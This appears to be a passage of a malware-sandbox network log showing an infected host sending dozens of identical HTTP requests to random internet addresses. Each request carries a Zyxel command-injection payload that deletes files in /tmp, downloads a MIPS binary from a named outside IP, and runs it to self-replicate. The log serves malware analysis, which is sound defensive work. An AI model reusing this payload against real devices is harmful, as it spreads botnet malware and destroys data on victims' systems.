                              Mar 31, 2024 08:41:10.592611074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1595192.168.2.1348194217.254.33.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592629910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1596192.168.2.133299870.84.95.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592674971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1597192.168.2.134138487.65.55.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592725039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1598192.168.2.1356444100.167.2.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592757940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1599192.168.2.1333780181.76.223.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592793941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1600192.168.2.135245464.192.165.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592838049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1601192.168.2.1347858116.58.197.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592885017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1602192.168.2.1349690139.160.152.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592917919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1603192.168.2.133558471.5.188.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592957973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1604192.168.2.1345758107.182.27.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592988968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1605192.168.2.1342336157.47.254.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593040943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1606192.168.2.1348792194.210.190.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593070984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1607192.168.2.1348368131.93.140.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593115091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1608192.168.2.1352178213.75.168.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593168974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1609192.168.2.134553244.17.131.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593193054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1610192.168.2.1353196159.34.152.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593228102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1611192.168.2.134534074.112.202.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593281984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1612192.168.2.1343086146.153.255.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593306065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1613192.168.2.1336942168.92.212.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593346119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1614192.168.2.135084024.11.209.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593395948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1615192.168.2.135588678.237.204.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593439102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1616192.168.2.135073664.34.228.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593476057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1617192.168.2.134369662.214.29.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593523026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1618192.168.2.1339286196.4.242.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593544960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1619192.168.2.135334664.5.117.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593617916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1620192.168.2.135021060.106.172.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593676090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1621192.168.2.1351558131.252.163.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593700886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1622192.168.2.1352100206.137.219.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593755960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1623192.168.2.1341926120.210.98.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593796015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1624192.168.2.135011446.179.147.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593837976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1625192.168.2.1350962173.42.152.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593867064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1626192.168.2.1352872221.128.93.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593900919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1627192.168.2.1337118174.168.237.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.593954086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1628192.168.2.1348774220.177.188.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594007015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1629192.168.2.135905617.203.240.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594033957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1630192.168.2.1338102203.237.47.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594073057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1631192.168.2.134303088.140.51.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594110012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1632192.168.2.1342208171.207.211.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594163895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1633192.168.2.1353700129.1.75.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594216108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1634192.168.2.1343132208.201.137.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594254971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1635192.168.2.1334050205.238.98.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594307899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1636192.168.2.134351417.207.49.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594362020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1637192.168.2.134733691.201.244.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594413996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1638192.168.2.135571047.207.37.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594432116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1639192.168.2.135016693.168.59.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594495058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1640192.168.2.1347314163.7.83.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594540119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1641192.168.2.134178490.246.162.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594558954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1642192.168.2.1348120149.11.103.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594593048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1643192.168.2.1352644169.44.96.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594631910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1644192.168.2.1360132144.85.245.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594686985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1645192.168.2.1352680132.134.234.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594716072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1646192.168.2.133809093.10.63.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594769955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1647192.168.2.1338642120.48.25.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594794989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1648192.168.2.1354384112.63.97.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594851971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1649192.168.2.1339550206.105.203.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594877958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1650192.168.2.1341280138.67.179.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594908953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1651192.168.2.135434891.129.222.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594945908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1652192.168.2.13473509.157.76.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.594985008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1653192.168.2.134035670.85.254.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595016956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1654192.168.2.1336504139.134.197.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595052958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1655192.168.2.1338740205.121.250.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595083952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1656192.168.2.1342400131.131.184.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595122099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1657192.168.2.1343614126.43.124.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595159054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1658192.168.2.133738823.118.54.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595179081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1659192.168.2.134487020.232.87.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595221043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1660192.168.2.1351280112.23.148.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595249891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1661192.168.2.1346342192.69.14.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595304966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1662192.168.2.133499088.65.106.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595321894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1663192.168.2.1351236192.58.14.179443
                              TimestampBytes transferredDirectionData
